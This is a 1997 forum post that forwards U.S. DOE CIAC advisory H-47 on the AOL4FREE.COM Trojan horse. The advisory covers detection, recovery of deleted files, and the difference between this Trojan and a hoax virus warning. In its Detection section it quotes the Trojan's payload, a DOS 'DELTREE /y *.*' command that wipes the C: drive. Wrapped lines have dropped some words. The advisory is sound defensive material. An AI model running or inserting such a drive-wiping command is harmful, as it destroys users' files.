View Full Version : Fw: AOL4FREE Virus

Lo King Sang Eddy
04-18-1997, 12:52 PM
> From: Joe Odenweller
> Subject: FW: AOL4FREE Virus
> Date: Saturday, April 19, 1997 AM 08:07
> Thought some here may find this interesting...
> Lots of Forwarding Info Deleted...
> __________________________________________________ ________
> The U.S. Department of Energy
> Computer Incident Advisory Capability
> ___ __ __ _ ___
> / | /_\ /
> \___ __|__ / \ \___
> __________________________________________________ ________
> AOL4FREE.COM Trojan Horse Program Destroys Hard Drives
> April 16, 1997 18:00 GMT Number
> H-47
__________________________________________________ __________________________

> __
> PROBLEM: A Trojan Horse program called AOL4FREE.COM that deletes
> files on a hard drive is circulating the Internet.
> PLATFORM: DOS/Windows-based PCs
> DAMAGE: When the AOL4FREE.COM program is executed, all files and
> directories on the users C: drive are deleted.
> SOLUTION: DO NOT execute this program. If the program starts
> executing,
> quickly pressing Ctrl-C will save some of your files.
__________________________________________________ __________________________

> __
> VULNERABILITY Users who download the trojaned AOL4FREE.COM program and
> ASSESSMENT: executes it will destroy all the files and directories on
> their
> DOS C: drive.
__________________________________________________ __________________________

> __
> CIAC has obtained a Trojaned copy of AOL4FREE.COM that destroys hard
> drives.
> CIAC has obtained a Trojaned copy of the AOL4FREE.COM program that, if
> deletes all the files on a user's hard drive. If you are e-mailed this
> file,
> or if you have downloaded it from an online service, do not attempt to
> it.
> If the program was received as an attachment to an e-mail message, do not
> double click (open) it. Opening an attached program runs that program,
> which
> in this case deletes all the files on your hard drive. The original
> AOL4FREE.COM was a program for fraudulently creating free AOL (America
> Online)
> accounts. Note that any attempt to use the original AOL4FREE.COM program
> may
> subject you to prosecution.
> NOTE: Most antivirus programs will not detect this or other Trojan Horse
> programs.
> Detection
> =========
> AOL4FREE.COM is a Trojan program that is 993 bytes (2 sectors) long.
> It masquerades as the AOL4FREE program that allows the fraudulent
> of
> free AOL accounts. The following text is readable in the AOL4FREE.COM
> if you display it with the DOS TYPE command or the DOS EDIT program.
> Compiled by BAT2EXEC 1.5
> PC Magazine . Douglas Boling
> Note that this text may appear in any program compiled with the BAT2EXEC
> program and has nothing to do with the Trojan Horse.
> If you open the AOL4FREE.COM file with a disk editor or with the Windows
> Notepad program, the following text is found at the end of the second
> sector
> of the file.
> /C C:
> /C CD\
> DELTREE /y *.*
> Where F*** is a common vulgar explicative.
> Recovery
> ========
> Pressing Ctrl-C before the Trojan Horse finishes deleting all your files
> will
> save some of them. If the program runs to completion, all the files on
> your root drive will have been deleted. The files are deleted with the
> DOS DELTREE command, so the contents of the files are still on your hard
> disk, only the directory entries have been deleted. Any program that can
> recover deleted files will allow you to recover some or all of the files
> on your hard disk.
> While attempting to recover files, be sure to not write any new files
> the hard disk as the new files may overwrite the contents of a deleted
> file,
> making it impossible to recover. You will probably have to boot your
> with a floppy and run any recovery programs from there.
> If you happen to have one of the delete tracking programs installed on
> system (a program that keeps track of deleted files in case you want them
> back) the recovery operation will be relatively simple. Follow the
> directions
> in your delete tracking program to recover your files. If not, you will
> probably have to recover each file individually, supplying the first
> character
> of the file name, which is overwritten in the directory when the file is
> deleted. Most DOS/Windows disk tools programs also have the capability
> recovering deleted files so follow the directions included with those
> programs
> to do so.
> Background
> ==========
> The original AOL4FREE.COM program was developed to fraudulently create
> AOL accounts. The creator of that program has pleaded guilty to
> America Online for distributing that program. Anyone else attempting to
> that program to defraud AOL could also be prosecuted.
> An e-mail message was recently circulating about the Internet that warned
> of
> an AOL4FREE virus, but that warning is either a hoax or a badly
> misunderstood
> description of this Trojan Horse.
> 1. This program is a Trojan Horse, not a virus. It does not spread on
> own.
> 2. A Trojan Horse must be run to do any damage.
> 3. Reading an e-mail message with the Trojan Horse program as an
> attachment
> will not run the Trojan Horse and will not do any damage. Note that
> opening an attached program from within an e-mail reader runs that
> attached program, which may make it appear that reading the
> caused the damage. Users should keep in mind that any file with a
> or
> .EXE extension is a program, not a document and that double clicking
> opening that program will run it.
> CIAC still affirms that reading an e-mail message, even one with an
> attached
> program, can not do damage to a system. The attachment must be both
> downloaded
> onto the system and run to do any damage.
> CIAC, the Computer Incident Advisory Capability, is the computer
> security incident response team for the U.S. Department of Energy
> (DOE) and the emergency backup response team for the National
> Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
> National Laboratory in Livermore, California. CIAC is also a founding
> member of FIRST, the Forum of Incident Response and Security Teams, a
> global organization established to foster cooperation and coordination
> among computer security teams worldwide.
> CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
> can be contacted at:
> Voice: +1 510-422-8193
> FAX: +1 510-423-8002
> STU-III: +1 510-423-2604
> E-mail: ciac@llnl.gov
> For emergencies and off-hour assistance, DOE, DOE contractor sites,
> and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
> 8AM PST), call the CIAC voice number 510-422-8193 and leave a message,
> or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
> Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
> duty person, and the secondary PIN number, 8550074 is for the CIAC
> Project Leader.
> Previous CIAC notices, anti-virus software, and other information are
> available from the CIAC Computer Security Archive.
> World Wide Web: http://ciac.llnl.gov/
> Anonymous FTP: ciac.llnl.gov (
> Modem access: +1 (510) 423-4753 (28.8K baud)
> +1 (510) 423-3331 (28.8K baud)
> CIAC has several self-subscribing mailing lists for electronic
> publications:
> 1. CIAC-BULLETIN for Advisories, highest priority - time critical
> information and Bulletins, important computer security information;
> 2. CIAC-NOTES for Notes, a collection of computer security articles;
> 3. SPI-ANNOUNCE for official news about Security Profile Inspector
> (SPI) software updates, new features, distribution and
> availability;
> 4. SPI-NOTES, for discussion of problems and solutions regarding the
> use of SPI products.
> Our mailing lists are managed by a public domain software package
> called Majordomo, which ignores E-mail header subject lines. To
> subscribe (add yourself) to one of our mailing lists, send the
> following request as the E-mail message body, substituting
> ciac-bulletin, ciac-notes, spi-announce OR spi-notes for list-name:
> E-mail to ciac-listproc@llnl.gov or majordomo@tholia.llnl.gov:
> subscribe list-name
> e.g., subscribe ciac-notes
> You will receive an acknowledgment email immediately with a confirmation
> that you will need to mail back to the addresses above, as per the
> instructions in the email. This is a partial protection to make sure
> you are really the one who asked to be signed up for the list in
> If you include the word 'help' in the body of an email to the above
> address,
> it will also send back an information file on how to
> get past issues of CIAC bulletins via email, etc.
> PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
> communities receive CIAC bulletins. If you are not part of these
> communities, please contact your agency's response team to report
> incidents. Your agency's team will coordinate with CIAC. The Forum of
> Incident Response and Security Teams (FIRST) is a world-wide
> organization. A list of FIRST member organizations and their
> constituencies can be obtained via WWW at http://www.first.org/.
> This document was prepared as an account of work sponsored by an
> agency of the United States Government. Neither the United States
> Government nor the University of California nor any of their
> employees, makes any warranty, express or implied, or assumes any
> legal liability or responsibility for the accuracy, completeness, or
> usefulness of any information, apparatus, product, or process
> disclosed, or represents that its use would not infringe privately
> owned rights. Reference herein to any specific commercial products,
> process, or service by trade name, trademark, manufacturer, or
> otherwise, does not necessarily constitute or imply its endorsement,
> recommendation or favoring by the United States Government or the
> University of California. The views and opinions of authors expressed
> herein do not necessarily state or reflect those of the United States
> Government or the University of California, and shall not be used for
> advertising or product endorsement purposes.
> LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)
> H-36: Solaris 2.x CDE sdtcm_convert Vulnerability
> H-37: Solaris 2.x passwd buffer Overrun Vulnerability
> H-38A: Internet Explorer 3.x Vulnerabilities
> H-39: SGI IRIX fsdump Vulnerability
> H-40: DIGITAL Security Vulnerabilities (DoP, delta-time)
> H-41: Solaris 2.x eject Buffer Overrun Vulnerability
> H-42: HP MPE/iX with ICMP Echo Request (ping) Vulnerability
> H-44: Solaris 2.x fdformat Buffer Overflow Vulnerability
> H-45: Windows NT SAM permission Vulnerability
> H-46: Vulnerability in IMAP and POP
> Version: 4.0 Business Edition
> iQCVAwUBM1V5O7nzJzdsy3QZAQEdBAP/TtbGhSA3UuEScYZOcAmOmG426yP3ga7n
> Y5FUo/8Z+am09tlchSzE5oGeNlBd2bDHFv9jnF3AtchzUPoRuLxBoSzP qh4OrYbo
> ISNsPq4JzNNVjKVTfCW1UhvRAVtfzg/NmgdZNO038gaX1Zg9Uo1JpYuIUZw8e5XL
> zRV+YdzlJcw=
> =j2Ew